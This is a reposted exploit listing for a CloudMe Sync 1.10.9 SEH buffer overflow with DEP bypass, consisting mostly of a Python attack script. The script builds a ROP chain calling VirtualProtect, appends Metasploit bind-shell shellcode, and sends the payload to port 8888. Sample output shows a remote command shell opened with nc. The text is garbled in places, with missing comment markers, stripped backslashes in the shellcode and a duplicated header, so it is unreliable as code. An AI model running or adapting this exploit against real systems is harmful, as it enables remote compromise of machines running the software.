CloudMe Sync SEH Buffer Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 330

# Exploit: CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)
# Date: 2018-05-27
# Author: Juan Prescotto
# Tested Against: Win7 Pro SP1 64 bit
# Software Dow # Exploit: CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)
# Date: 2018-05-27
# Author: Juan Prescotto
# Tested Against: Win7 Pro SP1 64 bit
# Software Download: https://www.cloudme.com/downloads/CloudMe_1109.exe
# Tested Against Version: 1.10.9
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine
# Credit: Thanks to John Page (aka hyp3rlinx) (https://www.exploit-db.com/exploits/44027/)
# for his work on the original exploit

# Bad Characers: x00
# SEH Offset: 2236
# Non-Participating Modules Used: Qt5Gui.dll, Qt5Core.dll,libstdc++-6.dll, libgcc_s_dw2-1.dll, libwinpthread-1.dll

# Victim Machine:
# C:>netstat -nao | find "8888"
# TCP 0.0.0.0:8888 0.0.0.0:0 LISTENING 2640
# C:>tasklist | find "2640"
# CloudMe.exe 2640 Console 1 36,632 K

# Attacking Machine:
# root@kali:~/Desktop# python cloudme.py
# CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass
# [+] CloudMe Target IP> 192.168.12.4
# Sending buffer overflow to CloudMe Service
# Target Should be Running a Bind Shell on Port 4444!

# root@kali:~/Desktop# nc -nv 192.168.12.4 4444
# (UNKNOWN) [192.168.12.4] 4444 (?) open
# Microsoft Windows [Version 6.1.7601]
# Copyright (c) 2009 Microsoft Corporation. All rights reserved.

# C:UsersjprescottoAppDataLocalProgramsCloudMeCloudMe>
# My register setup when VirtualProtect() is called (Defeat DEP) :
--
# EAX = NOP (0x90909090)
# ECX = lpOldProtect (ptr to W address)
# EDX = NewProtect (0x40)
# EBX = dwSize
# ESP = lPAddress (automatic)
# EBP = ReturnTo (ptr to jmp esp)
# ESI = ptr to VirtualProtect()
# EDI = ROP NOP (RETN)

#!/usr/bin/python

import socket,struct

print 'CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass'

def create_rop_chain():

rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x61d1e7fe, POP ECX RETN [Qt5Gui.dll]
0x690398a8, ptr to &VirtualProtect() [IAT Qt5Core.dll]
0x6fe70610, MOV EAX,DWORD PTR DS:[ECX] RETN [libstdc++-6.dll]
0x61c40a6f, XCHG EAX,ESI RETN [Qt5Gui.dll]
0x68c8ea5a, POP EBP RETN [Qt5Core.dll]
0x68d652e1, & call esp [Qt5Core.dll]
0x68fa7ca2, POP EDX RETN [Qt5Core.dll]
0xfffffdff, Value to negate, will become 0x00000201
0x6eb47092, NEG EDX RETN [libgcc_s_dw2-1.dll]
0x68d52747, POP EBX RETN [Qt5Core.dll]
0xffffffff,
0x68f948bc, INC EBX RETN [Qt5Core.dll]
0x68f8063c, ADD EBX,EDX ADD AL,0A RETN [Qt5Core.dll]
0x68f9a472, POP EDX RETN [Qt5Core.dll]
0xffffffc0, Value to negate, will become 0x00000040
0x6eb47092, NEG EDX RETN [libgcc_s_dw2-1.dll]
0x61f057ab, POP ECX RETN [Qt5Gui.dll]
0x6eb5efa3, &Writable location [libgcc_s_dw2-1.dll]
0x61dc14d1, POP EDI RETN [Qt5Gui.dll]
0x64b4ed0c, RETN (ROP NOP) [libwinpthread-1.dll]
0x61ba6245, POP EAX RETN [Qt5Gui.dll]
0x90909090, nop
0x61b45ea3, PUSHAD RETN [Qt5Gui.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

#msf payload(shell_bind_tcp) > show options
#Module options (payload/windows/shell_bind_tcp):
# Name Current Setting Required Description
# EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
# LPORT 4444 yes The listen port
# RHOST no The target address
#msf payload(shell_bind_tcp) > generate -b 'x00' -t py
# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai

shellcode = ""
shellcode += "xdaxcfxbax8cx90x7bx70xd9x74x24xf4x5ex33"
shellcode += "xc9xb1x53x31x56x17x83xeexfcx03xdax83x99"
shellcode += "x85x1ex4bxdfx66xdex8cx80xefx3bxbdx80x94"
shellcode += "x48xeex30xdex1cx03xbaxb2xb4x90xcex1axbb"
shellcode += "x11x64x7dxf2xa2xd5xbdx95x20x24x92x75x18"
shellcode += "xe7xe7x74x5dx1ax05x24x36x50xb8xd8x33x2c"
shellcode += "x01x53x0fxa0x01x80xd8xc3x20x17x52x9axe2"
shellcode += "x96xb7x96xaax80xd4x93x65x3bx2ex6fx74xed"
shellcode += "x7ex90xdbxd0x4ex63x25x15x68x9cx50x6fx8a"
shellcode += "x21x63xb4xf0xfdxe6x2ex52x75x50x8ax62x5a"
shellcode += "x07x59x68x17x43x05x6dxa6x80x3ex89x23x27"
shellcode += "x90x1bx77x0cx34x47x23x2dx6dx2dx82x52x6d"
shellcode += "x8ex7bxf7xe6x23x6fx8axa5x2bx5cxa7x55xac"
shellcode += "xcaxb0x26x9ex55x6bxa0x92x1exb5x37xd4x34"
shellcode += "x01xa7x2bxb7x72xeexefxe3x22x98xc6x8bxa8"
shellcode += "x58xe6x59x44x50x41x32x7bx9dx31xe2x3bx0d"
shellcode += "xdaxe8xb3x72xfax12x1ex1bx93xeexa1x32x38"
shellcode += "x66x47x5exd0x2exdfxf6x12x15xe8x61x6cx7f"
shellcode += "x40x05x25x69x57x2axb6xbfxffxbcx3dxacx3b"
shellcode += "xddx41xf9x6bx8axd6x77xfaxf9x47x87xd7x69"
shellcode += "xebx1axbcx69x62x07x6bx3ex23xf9x62xaaxd9"
shellcode += "xa0xdcxc8x23x34x26x48xf8x85xa9x51x8dxb2"
shellcode += "x8dx41x4bx3ax8ax35x03x6dx44xe3xe5xc7x26"
shellcode += "x5dxbcxb4xe0x09x39xf7x32x4fx46xd2xc4xaf"
shellcode += "xf7x8bx90xd0x38x5cx15xa9x24xfcxdax60xed"
shellcode += "x1cx39xa0x18xb5xe4x21xa1xd8x16x9cxe6xe4"
shellcode += "x94x14x97x12x84x5dx92x5fx02x8exeexf0xe7"
shellcode += "xb0x5dxf0x2d"

ip=raw_input('[+] CloudMe Target IP> ')

stack_pivot=struct.pack('<L',0x61d95f58) {pivot 3492 / 0xda4} (Lands us into rop nop chain --> rop_chain) : SUB ESP,8 ADD ESP,0D8C POP EBX POP ESI POP EDI POP EBP RETN 0x08 ** [Qt5Gui.dll] ** | {PAGE_EXECUTE_READ}
rop_nop1=struct.pack('<L',0x68b1a714) * 300 RETN 0x10 ** [Qt5Core.dll] ** | {PAGE_EXECUTE_READ}
rop_nop2=struct.pack('<L',0x61c6fc53) * 50 RETN ** [Qt5Gui.dll] ** | {PAGE_EXECUTE_READ}
nop = "x90" * 20

payload = "A" * 2236 + stack_pivot + rop_nop1 + rop_nop2 + rop_chain + nop + shellcode + "B"*(5600-len(rop_nop1)-len(rop_nop2)-len(rop_chain)-len(nop)-len(shellcode))

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,8888))
s.send(payload)
print 'Sending buffer overflow to CloudMe Service'
print 'Target Should be Running a Bind Shell on Port 4444!'